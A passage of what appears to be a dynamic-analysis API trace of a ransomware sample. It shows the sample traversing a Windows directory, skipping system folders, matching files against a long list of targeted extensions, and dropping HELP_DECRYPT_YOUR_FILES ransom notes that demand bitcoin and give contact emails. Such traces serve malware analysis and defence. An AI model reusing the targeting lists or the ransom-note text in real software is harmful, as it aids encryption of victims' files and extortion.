	[0174.577] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*.*"
	[0174.577] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName=".", cAlternateFileName="")) returned 0xfb9230
	[0174.577] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*.*") returned 97
	[0174.578] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.578] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*") returned 0x61
	[0174.578] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.578] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0174.578] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.578] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0174.578] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.579] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0174.579] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.579] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0174.579] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.579] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0174.579] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.580] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0174.580] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.580] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0174.580] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.580] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0174.580] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.580] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0174.580] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.581] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0174.581] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.581] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0174.581] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.581] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0174.581] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.582] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0174.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.582] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0174.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.582] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0174.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.582] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0174.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.583] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0174.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.583] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0174.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.583] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0174.583] FindNextFileW (in: hFindFile=0xfb9230, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName="..", cAlternateFileName="")) returned 1
	[0174.584] FindNextFileW (in: hFindFile=0xfb9230, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ce2cc2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ce2cc2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0d08f31, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x663, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0174.584] lstrcmpW (lpString1="Power_0.provxml", lpString2="..") returned 1
	[0174.584] lstrcmpW (lpString1="Power_0.provxml", lpString2=".") returned 1
	[0174.584] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\"
	[0174.584] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\", lpString2="Power_0.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml"
	[0174.584] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml") returned 109
	[0174.584] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.584] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml") returned 0x6d
	[0174.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.585] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0174.585] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml"
	[0174.585] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\power_0.provxml") returned 109
	[0174.585] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.586] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0174.586] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.586] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0174.586] FindNextFileW (in: hFindFile=0xfb9230, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ce2cc2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ce2cc2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0d08f31, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x663, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 0
	[0174.586] FindClose (in: hFindFile=0xfb9230 | out: hFindFile=0xfb9230) returned 1
	[0174.587] FindClose (in: hFindFile=0xfb9230 | out: hFindFile=0xfb9230) returned 0
	[0174.587] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime"
	[0174.587] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*.*"
	[0174.587] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.588] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.588] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT") returned 121
	[0174.588] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0174.914] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0174.914] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0174.918] CloseHandle (hObject=0x39c) returned 1
	[0174.919] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.919] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.919] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0174.921] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0174.921] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0174.921] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0174.921] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0174.921] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0174.922] CloseHandle (hObject=0x39c) returned 1
	[0174.922] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.922] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.923] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0174.923] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML") returned 122
	[0174.923] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0174.927] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you 